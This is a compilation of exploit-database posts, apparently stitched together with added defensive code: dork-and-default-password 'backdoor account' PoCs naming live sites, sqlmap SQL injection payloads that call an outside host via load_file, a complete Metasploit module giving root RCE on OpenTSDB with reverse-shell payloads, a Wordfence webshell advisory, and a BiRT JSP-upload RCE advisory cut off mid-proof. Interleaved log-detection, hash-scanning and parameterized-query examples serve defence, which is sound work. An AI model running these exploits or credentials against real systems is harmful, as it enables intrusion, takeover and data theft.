<pre><code>====================================================================================================================================<br />| # Title : Car Dealer Pro v2.01 Backdoor Account Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 102.0.1(64-bit) | <br />| # Vendor : https://codecanyon.net/item/car-dealer-pro/7265588 | <br />| # Dork : "Powered by: Car Dealer Pro" |<br />====================================================================================================================================<br /><br />poc :<br /><br /><br />[+] Dorking in Google or another search engine.<br /><br />[+] Use Payload : user=admin & pass=pass1234 <br /><br />[+] http://car.wenclub.vip/admin/<br /><br />Greetings to :=========================================================================================================================<br /> |<br />jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet | <br /> |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Botble 5.28.3 Backdoor Account Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 103.0(64-bit) | <br />| # Vendor : https://codecanyon.net/item/botble-cms-php-platform-based-on-laravel-framework/16928182 | <br />| # Dork : "Botble Technologies. All right reserved." |<br />====================================================================================================================================<br /><br />poc :<br /><br /><br />[+] Dorking in Google or another search engine.<br /><br />[+] Use Payload : user=botble & pass=159357 <br /><br />[+] https://cms.botble.com/admin/login<br /><br />Greetings to :=========================================================================================================================<br /> |<br />jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet | <br /> |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Active ecommerce cms v6.4.0 Backdoor Account Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 108.0(64-bit) | <br />| # Vendor : https://codecanyon.net/item/active-ecommerce-cms/23471405?s_rank=24 | <br />| # Dork : "category/beauty-health-hair" |<br />====================================================================================================================================<br /><br />poc :<br /><br /><br />[+] Dorking in Google or another search engine.<br /><br />[+] Use Payload : user=admin@example.com & pass=123456 <br /><br />[+] https://www.sbeshopping.com/login<br /><br />Greetings to :=========================================================================================================================<br /> |<br />jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet | <br /> |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>## Title: Student-Attendance-Management-System 1.0 from Erick O. Omundi Multiple-SQLi<br />## Author: nu11secur1ty<br />## Date: 12.25.2022<br />## Vendor: https://github.com/rickxy<br />## Software: https://github.com/rickxy/Student-Attendance-Management-System<br />## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/rickxy/2022/Student-Attendance-Management-System<br /><br />## Description:<br />The `username` parameter appears to be vulnerable to multiple SQL<br />injection attacks.<br />The attacker can retrieve all sensitive information about the users of<br />this system and cause further damage.<br /><br />## STATUS: CRITICAL Vulnerability<br /><br />[+] Payload:<br /><br />```MySQL<br />---<br />Parameter: username (POST)<br /> Type: boolean-based blind<br /> Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY<br />or GROUP BY clause<br /> Payload: userType=Administrator&username=lBPxXeUT'+(select<br />load_file('\\\\eq8r4p3b9u6gn42v38f6ca4cf3lw9oxf03sqje8.erick_from_America.com\\khw'))+''<br />RLIKE (SELECT (CASE WHEN (6217=6217) THEN 0x6c42507858655554+(select<br />load_file(0x5c5c5c5c6571387234703362397536676e343276333866366361346366336c77396f7866303373716a65382e657269636b5f66726f6d5f416d65726963612e636f6d5c5c6b6877))+''<br />ELSE 0x28 END)) AND 'FUJm'='FUJm&password=q2H!z4n!F1&login=Login<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: userType=Administrator&username=lBPxXeUT'+(select<br />load_file('\\\\eq8r4p3b9u6gn42v38f6ca4cf3lw9oxf03sqje8.erick_from_America.com\\khw'))+''<br />AND (SELECT 8687 FROM (SELECT(SLEEP(7)))btHE) AND<br />'XFcq'='XFcq&password=q2H!z4n!F1&login=Login<br />---<br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/rickxy/2022/Student-Attendance-Management-System)<br /><br />## Proof and Exploit:<br />[href](https://streamable.com/goy6ka)<br /><br />## Time spent<br />`00:30:00`<br /><br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> include Msf::Exploit::Remote::HttpClient<br /> include Msf::Exploit::CmdStager<br /> prepend Msf::Exploit::Remote::AutoCheck<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'OpenTSDB 2.4.0 unauthenticated command injection',<br /> 'Description' => %q{<br /> This module exploits an unauthenticated command injection<br /> vulnerability in the yrange parameter in OpenTSDB through<br /> 2.4.0 (CVE-2020-35476) in order to achieve unauthenticated<br /> remote code execution as the root user.<br /><br /> The module first attempts to obtain the OpenTSDB version via<br /> the api. If the version is 2.4.0 or lower, the module<br /> performs additional checks to obtain the configured metrics<br /> and aggregators. It then randomly selects one metric and one<br /> aggregator and uses those to instruct the target server to<br /> plot a graph. 
As part of this request, the yrange parameter is<br /> set to the payload, which will then be executed by the target<br /> if the latter is vulnerable.<br /><br /> This module has been successfully tested against OpenTSDB<br /> version 2.3.0.<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Author' => [<br /> 'Shai rod', # @nightrang3r - discovery and PoC<br /> 'Erik Wynter' # @wyntererik - Metasploit<br /> ],<br /> 'References' => [<br /> ['CVE', '2020-35476'],<br /> ['URL', 'https://github.com/OpenTSDB/opentsdb/issues/2051'] # disclosure and PoC<br /> ],<br /> 'DefaultOptions' => {<br /> 'RPORT' => 4242<br /> },<br /> 'Platform' => %w[unix linux],<br /> 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],<br /> 'CmdStagerFlavor' => %w[bourne curl wget],<br /> 'Targets' => [<br /> [<br /> 'Automatic (Unix In-Memory)',<br /> {<br /> 'Platform' => 'unix',<br /> 'Arch' => ARCH_CMD,<br /> 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse' },<br /> 'Type' => :unix_memory<br /> }<br /> ],<br /> [<br /> 'Automatic (Linux Dropper)',<br /> {<br /> 'Platform' => 'linux',<br /> 'Arch' => [ARCH_X86, ARCH_X64],<br /> 'DefaultOptions' => { 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp' },<br /> 'Type' => :linux_dropper<br /> }<br /> ]<br /> ],<br /> 'Privileged' => true,<br /> 'DisclosureDate' => '2020-11-18',<br /> 'DefaultTarget' => 1,<br /> 'Notes' => {<br /> 'Stability' => [ CRASH_SAFE ],<br /> 'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],<br /> 'Reliability' => [ REPEATABLE_SESSION ]<br /> }<br /> )<br /> )<br /><br /> register_options [<br /> OptString.new('TARGETURI', [true, 'The base path to OpenTSDB', '/']),<br /> ]<br /> end<br /><br /> def check<br /> # sanity check to see if the target is likely OpenTSDB<br /> res1 = send_request_cgi({<br /> 'method' => 'GET',<br /> 'uri' => normalize_uri(target_uri.path)<br /> })<br /><br /> unless res1<br /> return CheckCode::Unknown('Connection failed.')<br /> end<br /><br /> unless res1.code == 200 && 
res1.get_html_document.xpath('//title').text.include?('OpenTSDB')<br /> return CheckCode::Safe('Target is not an OpenTSDB application.')<br /> end<br /><br /> # get the version via the api<br /> res2 = send_request_cgi({<br /> 'method' => 'GET',<br /> 'uri' => normalize_uri(target_uri.path, 'api', 'version')<br /> })<br /><br /> unless res2<br /> return CheckCode::Unknown('Connection failed.')<br /> end<br /><br /> unless res2.code == 200 && res2.body.include?('version')<br /> return CheckCode::Detected('Target may be OpenTSDB but the version could not be determined.')<br /> end<br /><br /> begin<br /> parsed_res_body = JSON.parse(res2.body)<br /> rescue JSON::ParserError<br /> return CheckCode::Detected('Could not determine the OpenTSDB version: the HTTP response body did not match the expected JSON format.')<br /> end<br /><br /> unless parsed_res_body.is_a?(Hash) && parsed_res_body.key?('version')<br /> return CheckCode::Detected('Could not determine the OpenTSDB version: the HTTP response body did not match the expected JSON format.')<br /> end<br /><br /> version = parsed_res_body['version']<br /><br /> begin<br /> if Rex::Version.new(version) <= Rex::Version.new('2.4.0')<br /> return CheckCode::Appears("The target is OpenTSDB version #{version}")<br /> else<br /> return CheckCode::Safe("The target is OpenTSDB version #{version}")<br /> end<br /> rescue ArgumentError => e<br /> return CheckCode::Unknown("Failed to obtain a valid OpenTSDB version: #{e}")<br /> end<br /> end<br /><br /> def select_metric<br /> # check if any metrics have been configured. 
if not, exploitation cannot work<br /> res = send_request_cgi({<br /> 'method' => 'GET',<br /> 'uri' => normalize_uri(target_uri.path, 'suggest'),<br /> 'vars_get' => { 'type' => 'metrics' }<br /> })<br /><br /> unless res<br /> fail_with(Failure::Unknown, 'Connection failed.')<br /> end<br /><br /> unless res.code == 200<br /> fail_with(Failure::UnexpectedReply, "Received unexpected status code #{res.code} when checking the configured metrics")<br /> end<br /><br /> begin<br /> metrics = JSON.parse(res.body)<br /> rescue JSON::ParserError<br /> fail_with(Failure::UnexpectedReply, 'Received unexpected reply when checking the configured metrics: The response body did not contain valid JSON.')<br /> end<br /><br /> unless metrics.is_a?(Array)<br /> fail_with(Failure::UnexpectedReply, 'Received unexpected reply when checking the configured metrics: The response body did not contain a JSON array')<br /> end<br /><br /> if metrics.empty?<br /> fail_with(Failure::NoTarget, 'Failed to identify any configured metrics. This makes exploitation impossible')<br /> end<br /><br /> # select a random metric since any will do<br /> @metric = metrics.sample<br /> print_status("Identified #{metrics.length} configured metrics. 
Using metric #{@metric}")<br /> end<br /><br /> def select_aggregator<br /> # check the configured aggregators and select one at random<br /> res = send_request_cgi({<br /> 'method' => 'GET',<br /> 'uri' => normalize_uri(target_uri.path, 'aggregators')<br /> })<br /><br /> unless res<br /> fail_with(Failure::Unknown, 'Connection failed.')<br /> end<br /><br /> unless res.code == 200<br /> fail_with(Failure::UnexpectedReply, "Received unexpected status code #{res.code} when checking the configured aggregators")<br /> end<br /><br /> begin<br /> aggregators = JSON.parse(res.body)<br /> rescue JSON::ParserError<br /> fail_with(Failure::UnexpectedReply, 'Received unexpected reply when checking the configured aggregators: The response body did not contain valid JSON.')<br /> end<br /><br /> unless aggregators.is_a?(Array)<br /> fail_with(Failure::UnexpectedReply, 'Received unexpected reply when checking the configured aggregators: The response body did not contain a JSON array')<br /> end<br /><br /> if aggregators.empty?<br /> fail_with(Failure::NoTarget, 'Failed to identify any configured aggregators. This makes exploitation impossible')<br /> end<br /><br /> # select a random aggregator since any will do<br /> @aggregator = aggregators.sample<br /> print_status("Identified #{aggregators.length} configured aggregators. 
Using aggregator #{@aggregator}")<br /> end<br /><br /> def execute_command(cmd, _opts = {})<br /> # use base64 to avoid special char escape hell (specifying BadChars did not help)<br /> cmd = "'echo #{Base64.strict_encode64(cmd)} | base64 -d | /bin/sh'"<br /> start_time = rand(20.year.ago..10.year.ago) # this should be a date far enough in the past to make sure we capture all possible data<br /> start_value = start_time.strftime('%Y/%m/%d-%H:%M:%S')<br /> end_time = rand(1.year.since..10.year.since) # this can be a date in the future to make sure we capture all possible data<br /> end_value = end_time.strftime('%Y/%m/%d-%H:%M:%S')<br /><br /> get_vars = {<br /> 'start' => start_value,<br /> 'end' => end_value,<br /> 'm' => "#{@aggregator}:#{@metric}",<br /> 'yrange' => "[1:system(#{Rex::Text.uri_encode(cmd)})]",<br /> 'wxh' => "#{rand(800..1600)}x#{rand(400..600)}",<br /> 'style' => 'linespoint'<br /> }<br /><br /> exploit_uri = '?'<br /> get_vars.each do |key, value|<br /> exploit_uri += "#{key}=#{value}&"<br /> end<br /> exploit_uri += 'json'<br /><br /> # using a raw request because cgi was leading to encoding issues<br /> send_request_raw({<br /> 'method' => 'GET',<br /> 'uri' => normalize_uri(target_uri.path, 'q' + exploit_uri)<br /> }, 0) # we don't have to wait for a reply here<br /> end<br /><br /> def exploit<br /> select_metric<br /> select_aggregator<br /> if target.arch.first == ARCH_CMD<br /> print_status('Executing the payload')<br /> execute_command(payload.encoded)<br /> else<br /> execute_cmdstager(background: true)<br /> end<br /> end<br />end<br /></code></pre>
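Added detection example, not part of the Metasploit module above: the module's notes declare IOC_IN_LOGS, and its execute_command builds a /q request whose yrange parameter is "[1:system(...)]" instead of the numeric "[lo:hi]" range gnuplot expects. A defender can therefore flag any /q request whose yrange is not a plain numeric range. The access-log lines below are constructed for the demo, the combined-log regex is an assumption about the proxy's log format, and the allow-pattern for yrange is the editor's, not OpenTSDB's own parser.

```python
import re
from urllib.parse import urlsplit, parse_qs

# What a legitimate gnuplot yrange looks like: "[lo:hi]" where each bound is a
# number, "*" or empty ("[0:100]", "[:]", "[*:*]", "[1:]"). Anything else is flagged.
_BOUND = r"(?:-?\d+(?:\.\d+)?|\*)?"
YRANGE_OK = re.compile(rf"^\[\s*{_BOUND}\s*:\s*{_BOUND}\s*\]$")

# Assumed combined log layout: client, identd, user, [timestamp], "METHOD PATH PROTO", status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3})'
)


def check_request_path(path):
    """Return a finding for an OpenTSDB /q request with a suspicious yrange, else None."""
    parts = urlsplit(path)
    if not parts.path.endswith("/q"):
        return None
    # parse_qs percent-decodes, so "%5B1%3Asystem(...)%5D" is seen as "[1:system(...)]"
    params = parse_qs(parts.query, keep_blank_values=True)
    for value in params.get("yrange", []):
        if not YRANGE_OK.match(value):
            return {"param": "yrange", "value": value,
                    "reason": "yrange is not a numeric [lo:hi] range"}
    return None


def scan_log(lines):
    """Run check_request_path over access-log lines; returns the list of findings."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        finding = check_request_path(m.group("path"))
        if finding:
            finding.update(ip=m.group("ip"), ts=m.group("ts"))
            findings.append(finding)
    return findings


# Constructed sample log: two benign graph requests, one carrying a system() call,
# one unrelated API call.
SAMPLE_LOG = [
    '10.0.0.5 - - [18/Nov/2020:10:01:02 +0000] "GET /q?start=1h-ago&m=sum:sys.cpu.user&yrange=[0:100]&wxh=800x400&style=linespoint&json HTTP/1.1" 200 512',
    '10.0.0.5 - - [18/Nov/2020:10:01:05 +0000] "GET /q?start=1h-ago&m=sum:sys.cpu.user&yrange=%5B%3A%5D&json HTTP/1.1" 200 480',
    '203.0.113.9 - - [18/Nov/2020:10:02:11 +0000] "GET /q?start=2002/03/04-00:00:00&end=2030/01/01-00:00:00&m=sum:sys.cpu.user&yrange=%5B1%3Asystem(%27id%27)%5D&wxh=1024x500&style=linespoint&json HTTP/1.1" 200 0',
    '10.0.0.7 - - [18/Nov/2020:10:03:00 +0000] "GET /api/version HTTP/1.1" 200 90',
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} {f['param']}={f['value']!r}: {f['reason']}")
```

The rule is an allow-list on the parameter's shape rather than a block-list on the string "system(", so encodings or alternative gnuplot functions do not slip past it; the cost is that an unusual but legitimate yrange (e.g. with exponent notation) would also be reported and would need adding to the pattern.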
<pre><code>Description: Unauthenticated Arbitrary File Upload<br /><br />Affected Plugin: Yith WooCommerce Gift Cards Premium<br /><br />Plugin Slug: yith-woocommerce-gift-cards-premium<br /><br />Affected Versions: <= 3.19.0<br /><br />CVE ID: CVE-2022-45359<br /><br />CVSS Score: 9.8 (Critical)<br /><br />CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N<br /><br />Researcher/s: Dave Jong<br /><br />Fully Patched Version: 3.20.0<br /><br />We were able to reverse engineer the exploit based on attack traffic and a copy of the vulnerable plugin and are providing information on its functionality as this vulnerability is already being exploited in the wild and a patch has been available for some time.<br /><br />The issue lies in the import_actions_from_settings_panel function which runs on the admin_init hook.<br /><br />Since admin_init runs for any page in the /wp-admin/ directory, it is possible to trigger functions that run on admin_init as an unauthenticated attacker by sending a request to /wp-admin/admin-post.php.<br /><br />Since the import_actions_from_settings_panel function also lacks a capability check and a CSRF check, it is trivial for an attacker to simply send a request containing a page parameter set to yith_woocommerce_gift_cards_panel, a ywgc_safe_submit_field parameter set to importing_gift_cards, and a payload in the file_import_csv file parameter.<br /><br />Since the function also does not perform any file type checks, any file type including executable PHP files can be uploaded.<br /><br /><br />Cyber Observables<br /><br />These attacks may appear in your logs as unexpected POST requests to wp-admin/admin-post.php from unknown IP addresses. Additionally, we have observed the following payloads which may be useful in determining whether your site has been compromised. Note that we are providing normalized hashes (hashes of the file with all extraneous whitespace removed):<br /><br />kon.php/1tes.php – this file loads a copy of the “marijuana shell” file manager in memory from a remote location at shell[.]prinsh[.]com and has a normalized sha256 hash of 1a3babb9ac0a199289262b6acf680fb3185d432ed1e6b71f339074047078b28c<br /><br />b.php – this file is a simple uploader with a normalized sha256 hash of 3c2c9d07da5f40a22de1c32bc8088e941cea7215cbcd6e1e901c6a3f7a6f9f19<br /><br />admin.php – this file is a password-protected backdoor and has a normalized sha256 hash of 8cc74f5fa8847ba70c8691eb5fdf8b6879593459cfd2d4773251388618cac90d<br /><br />Although we’ve seen attacks from more than a hundred IPs, the vast majority of attacks were from just two IP addresses:<br /><br />103.138.108.15, which sent out 19604 attacks against 10936 different sites<br /><br />and<br /><br />188.66.0.135, which sent 1220 attacks against 928 sites.<br /><br />The majority of attacks occurred the day after the vulnerability was disclosed, but have been ongoing, with another peak on December 14, 2022. As this vulnerability is trivial to exploit and provides full access to a vulnerable website we expect attacks to continue well into the future.<br /><br />Recommendations<br /><br />If you are running a vulnerable version of YITH WooCommerce Gift Cards Premium, that is, any version up to and including 3.19.0, we strongly recommend updating to the latest version available. While the Wordfence firewall does provide protection against malicious file uploads even for free users, attackers may still be able to cause nuisance issues by abusing the vulnerable functionality in less critical ways.<br /><br />If you believe your site has been compromised as a result of this vulnerability or any other vulnerability, we offer Incident Response services via Wordfence Care. If you need your site cleaned immediately, Wordfence Response offers the same service with 24/7/365 availability and a 1-hour response time. Both of these products include hands-on support in case you need further assistance.<br /><br />If you have any friends or colleagues who are using this plugin, please share this announcement with them and encourage them to update to the latest patched version of YITH WooCommerce Gift Cards Premium as soon as possible.<br /><br />If you are a security researcher, you can responsibly disclose your finds to us and obtain a CVE ID and get your name on the Wordfence Intelligence Community Edition leaderboard.<br /><br /></code></pre>
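Added example for the "Cyber Observables" section; it is not Wordfence's code. The advisory publishes normalized sha256 hashes, i.e. hashes of each file with extraneous whitespace removed, so a plain `sha256sum` over files on disk will not match them. The scanner below strips whitespace before hashing and walks a web root looking for PHP files whose normalized hash is one of the three published values. Assumptions: "extraneous whitespace" is taken to mean every whitespace byte (the advisory does not spell out its exact rule), and the demo file is constructed, so it will not hit the real list.

```python
import hashlib
import os
import re
import tempfile

# Normalized sha256 hashes published in the advisory (values taken from the page).
KNOWN_WEBSHELLS = {
    "1a3babb9ac0a199289262b6acf680fb3185d432ed1e6b71f339074047078b28c": "kon.php / 1tes.php (marijuana shell loader)",
    "3c2c9d07da5f40a22de1c32bc8088e941cea7215cbcd6e1e901c6a3f7a6f9f19": "b.php (uploader)",
    "8cc74f5fa8847ba70c8691eb5fdf8b6879593459cfd2d4773251388618cac90d": "admin.php (password-protected backdoor)",
}

_WS = re.compile(rb"\s+")


def normalized_sha256(data: bytes) -> str:
    """sha256 over the file contents with all whitespace bytes removed.

    Assumption: the advisory's 'all extraneous whitespace removed' is implemented
    here as deleting every whitespace byte, which makes indentation and line
    endings irrelevant to the digest.
    """
    return hashlib.sha256(_WS.sub(b"", data)).hexdigest()


def scan_tree(root: str, known=KNOWN_WEBSHELLS, suffixes=(".php", ".phtml", ".php5")):
    """Walk a directory tree; return sorted [(path, label)] for PHP files with a known hash."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(suffixes):
                continue
            path = os.path.join(dirpath, name)
            with open(path, "rb") as fh:
                digest = normalized_sha256(fh.read())
            if digest in known:
                hits.append((path, known[digest]))
    return sorted(hits)


def demo_scan():
    """Constructed end-to-end demo: plant a harmless file in a temp tree and look it up
    via an injected hash list; returns the labels of the files found."""
    sample = b"<?php\n  echo 'constructed sample';\n?>\n"
    with tempfile.TemporaryDirectory() as tmp:
        path = os.path.join(tmp, "wp-content", "uploads", "x.php")
        os.makedirs(os.path.dirname(path))
        with open(path, "wb") as fh:
            fh.write(sample)
        with open(os.path.join(tmp, "notes.txt"), "wb") as fh:
            fh.write(sample)  # same bytes but not a PHP file: must be skipped
        hits = scan_tree(tmp, known={normalized_sha256(sample): "constructed sample"})
        return [label for _path, label in hits]


if __name__ == "__main__":
    print("demo hits:", demo_scan())
    # Real use: scan_tree("/var/www/html/wp-content") against KNOWN_WEBSHELLS
```

Because the match is on exact normalized content, a modified copy of the same shell will not be caught; treat a hit as confirmation and a miss as inconclusive, and pair it with the log check the advisory describes (unexpected POST requests to wp-admin/admin-post.php).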
<pre><code>## Title: Stock-Management-System-2022-1.0-from-Erick-Cesar Multiple SQLi<br />## Author: nu11secur1ty<br />## Date: 12.22.2022<br />## Vendor: https://github.com/rickxy/Stock-Management-System<br />## Software: https://github.com/rickxy/Stock-Management-System<br />## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/rickxy/2022/Stock-Management-System-1.0<br /><br />## Description:<br />The `user` parameter appears to be vulnerable to SQL injection attacks.<br />The payload ' was submitted in the user parameter, and a database<br />error message was returned.<br />The attacker can steal all information from the system by using this<br />vulnerability.<br /><br />## STATUS: HIGH Vulnerability - CRITICAL<br /><br />[+] Payload:<br /><br />```MySQL<br />---<br />Parameter: user (POST)<br /> Type: boolean-based blind<br /> Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY<br />or GROUP BY clause<br /> Payload: user=bqxDgfIK' RLIKE (SELECT (CASE WHEN (8457=8457) THEN<br />0x627178446766494b ELSE 0x28 END)) AND<br />'BTvs'='BTvs&password=s9U!o7d!C0&btnlogin=<br /><br /> Type: error-based<br /> Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or<br />GROUP BY clause (FLOOR)<br /> Payload: user=bqxDgfIK' AND (SELECT 5004 FROM(SELECT<br />COUNT(*),CONCAT(0x7178767071,(SELECT<br />(ELT(5004=5004,1))),0x7171707a71,FLOOR(RAND(0)*2))x FROM<br />INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND<br />'aQfu'='aQfu&password=s9U!o7d!C0&btnlogin=<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: user=bqxDgfIK' AND (SELECT 8137 FROM<br />(SELECT(SLEEP(7)))nCyy) AND 'vQsi'='vQsi&password=s9U!o7d!C0&btnlogin=<br />---<br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/rickxy/2022/Stock-Management-System-1.0)<br /><br /><br />## Proof and Exploit:<br />[href](https://streamable.com/gg7pyf)<br /><br />## Time spent<br />`00:05:00`<br /><br />## Writing an exploit<br />`00:05:00`<br /><br /></code></pre>
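Added example serving both nu11secur1ty advisories above (Student-Attendance-Management-System and Stock-Management-System); it is the editor's code, not the researcher's or the vendor's. Both advisories describe the same root cause: a login form whose `username`/`user` value is spliced into the SQL text, so a lone `'` produces a database error and an appended `AND '...'='...'` condition becomes part of the query (the boolean-based blind channel sqlmap reports). The snippet puts the string-built query next to the parameterized one and probes each with the same inputs. Assumptions: SQLite (`sqlite3`) stands in for MySQL, and the `users` table, account name and password are constructed for the demo.

```python
import sqlite3


def make_db():
    """Constructed in-memory database with one account."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, user TEXT, password TEXT)")
    conn.execute("INSERT INTO users (user, password) VALUES ('erick', 'correct horse')")
    conn.commit()
    return conn


def login_vulnerable(conn, user, password):
    """String-built query: whatever the client sends becomes SQL text (the advisories' pattern)."""
    sql = f"SELECT id FROM users WHERE user='{user}' AND password='{password}'"
    return conn.execute(sql).fetchone()


def login_safe(conn, user, password):
    """Parameterized query: the values are bound as data and can never change the statement."""
    sql = "SELECT id FROM users WHERE user=? AND password=?"
    return conn.execute(sql, (user, password)).fetchone()


def probe(conn, login_fn, user, password):
    """Classify the outcome the way a tester observes it: database error, row, or no row."""
    try:
        row = login_fn(conn, user, password)
    except sqlite3.Error:
        return "error"
    return "row" if row else "no row"


# Inputs mirroring the advisories: the lone quote that produced a database error,
# and a TRUE/FALSE pair of injected conditions of the 'x'='x form sqlmap appended.
CASES = [
    ("erick", "correct horse"),
    ("'", "x"),
    ("erick' AND '1'='1", "correct horse"),
    ("erick' AND '1'='2", "correct horse"),
]

if __name__ == "__main__":
    conn = make_db()
    print(f"{'user':<22} {'vulnerable':<12} {'parameterized':<12}")
    for user, password in CASES:
        v = probe(conn, login_vulnerable, user, password)
        s = probe(conn, login_safe, user, password)
        print(f"{user!r:<22} {v:<12} {s:<12}")
```

The two injected conditions produce different answers from the string-built query (row versus no row) while the password is unchanged, which is exactly the one-bit oracle a boolean-based blind payload relies on; the parameterized version returns "no row" for every malformed username and never raises, so neither the error channel nor the boolean channel exists.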
<pre><code>SEC Consult Vulnerability Lab Security Advisory < 20221216-0 ><br />=======================================================================<br /> title: Remote code execution - CVE-2021-34427 bypass<br /> product: Eclipse Business Intelligence Reporting Tool (BiRT)<br /> vulnerable version: <= 4.11.0<br /> fixed version: 4.12<br /> CVE number: CVE-2021-34427<br /> impact: High<br /> homepage: https://eclipse.github.io/birt-website/<br /> found: 2022-10-05<br /> by: Armin Stock (Atos)<br /> SEC Consult Vulnerability Lab<br /><br /> An integrated part of SEC Consult, an Atos company<br /> Europe | Asia | North America<br /><br /> https://www.sec-consult.com<br /><br />=======================================================================<br /><br />Vendor description:<br />-------------------<br />"With BIRT you can create data visualizations, dashboards and reports<br />that can be embedded into web applications and rich clients. Make information out<br />of your data!"<br /><br />https://eclipse.github.io/birt-website/<br /><br /><br />Business recommendation:<br />------------------------<br />The vendor provides a patch which should be installed immediately.<br /><br /><br />Vulnerability overview/description:<br />-----------------------------------<br />1) Remote code execution - CVE-2021-34427 bypass<br />The vulnerability described in CVE-2021-34427 (https://www.cvedetails.com/cve/CVE-2021-34427/)<br />allows an attacker to execute code on the server, by creating a `.jsp` file<br />with the `BiRT - WebViewerExample`. 
This was fixed with the following code:<br /><br />-------------------------------------------------------------------------------<br />// viewer/org.eclipse.birt.report.viewer/birt/WEB-INF/classes/org/eclipse/birt/report/context/ViewerAttributeBean.java#L1081<br /> protected static void checkExtensionAllowedForRPTDocument(String rptDocumentName) throws ViewerException {<br /> int extIndex = rptDocumentName.lastIndexOf(".");<br /> String extension = null;<br /> boolean validExtension = true;<br /><br /> if (extIndex > -1 && (extIndex + 1) < rptDocumentName.length()) {<br /> extension = rptDocumentName.substring(extIndex + 1);<br /><br /> if (!disallowedExtensionsForRptDocument.isEmpty()<br /> && disallowedExtensionsForRptDocument.contains(extension)) {<br /> validExtension = false;<br /> }<br /><br /> if (!allowedExtensionsForRptDocument.isEmpty() && !allowedExtensionsForRptDocument.contains(extension)) {<br /> validExtension = false;<br /> }<br /><br /> if (!validExtension) {<br /> throw new ViewerException(BirtResources.getMessage(<br /> ResourceConstants.ERROR_INVALID_EXTENSION_FOR_DOCUMENT_PARAMETER, new String[] { extension }));<br /> }<br /><br /> }<br /> }<br />-------------------------------------------------------------------------------<br /><br />This fix can be easily bypassed by adding `/.` to the filename which allows<br />an attacker to execute arbitrary code.<br /><br /><br />Proof of concept:<br />-----------------<br />1) Remote code execution - CVE-2021-34427 bypass<br />The old exploit results in an error message:<br /><br />-------------------------------------------------------------------------------<br />GET /birt/document?__report=test.rptdesign&sample=<@urlencode_all><% out.println("OS: " + System.getProperty("os.name")); out.println("Current dir: " + <br />getServletContext().getRealPath("/"));%><@/urlencode_all>&__document=<@urlencode>./test/info-new.jsp<@/urlencode> HTTP/1.1<br />Host: IP:18080<br />User-Agent: Mozilla/5.0 (X11; Linux 
x86_64; rv:91.0) Gecko/20100101 Firefox/91.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.8,de-DE;q=0.5,de;q=0.3<br />Accept-Encoding: gzip, deflate<br />Connection: close<br />Cookie: JSESSIONID=C2A5FE509AD277742111569F8656881A<br />Upgrade-Insecure-Requests: 1<br />-------------------------------------------------------------------------------<br /><br />Response:<br />-------------------------------------------------------------------------------<br />HTTP/1.1 200<br />Set-Cookie: JSESSIONID=A1E37E7FEC80DFFF155CAF9F642ADEB7; Path=/birt; HttpOnly<br />Content-Type: text/html;charset=utf-8<br />Date: Wed, 05 Oct 2022 06:14:54 GMT<br />Connection: close<br />Content-Length: 4644<br /><br /><html><br /><head><br /><title>Error</title><br /><META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=utf-8"/><br /></head><br /><body><br /><div id="birt_errorPage" style="color:red"><br /><span id="error_icon" style="cursor:pointer" onclick="if (document.getElementById('error_detail').style.display == 'none') { document.getElementById('error_icon').innerHTML = '- '; <br />document.getElementById('error_detail').style.display = 'block'; }else { document.getElementById('error_icon').innerHTML = '+ '; document.getElementById('error_detail').style.display = 'none'; }" > + <br /></span><br /><br />Invalid extension - "jsp" for the __document parameter.<br />-------------------------------------------------------------------------------<br /><br />But adding `/.` to the end of the filename creates the file on the server as<br />before:<br /><br 